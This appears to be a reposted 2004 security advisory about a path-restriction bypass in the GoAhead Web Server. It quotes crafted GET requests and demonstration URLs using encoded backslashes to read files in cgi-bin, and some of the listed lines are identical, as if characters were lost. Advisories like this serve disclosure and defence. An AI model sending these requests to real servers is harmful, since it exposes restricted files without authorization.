Previous articleBack to news listNext article
|
Sponsored links |
Want to become one of our authors and see your work published on ALLSeek.iNFO ?
|
| GoAhead Web Server Input Validation Flaw Discloses Files in Restricted Directories to Remote Users |
|---|
Categorie: Vulnerability
Posted: 2004-01-20 by ReCall
Views: 415
Source: Click here
| Current Rating: Not rated
|
|
| Details |
|---|
Description: An input validation vulnerability was reported in the GoAhead Web Server. A remote user can access certain restricted directories, such as the 'cgi-bin' directory.
Luigi Auriemma reported that a remote user can supply an HTTP GET request with extraneous or missing backslashes to obtain files in restricted directories:
GET file HTTP/1.0
GET file HTTP/1.0
GET /\%5cfile HTTP/1.0
It is reported that the websUrlHandlerDefine() function does not properly determine directory access restrictions when these characters are supplied.
Some demonstration exploit URLs are provided:
http://[target]/cgi-bin/cgitest.c
http://[target]/cgi-bin/cgitest.c
http://[target]/%5ccgi-bin/cgitest.c
Impact: A remote user can access files located in restricted directories, such as 'cgi-bin'.
Solution: No vendor solution was available at the time of this entry.
|
| Syndication |
|---|
Permalink Email this
The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=653
|
| User comments (post your comments ) |
|---|
Only registerd members can post comments and articles
|
|
Previous articleBack to news listNext article
|
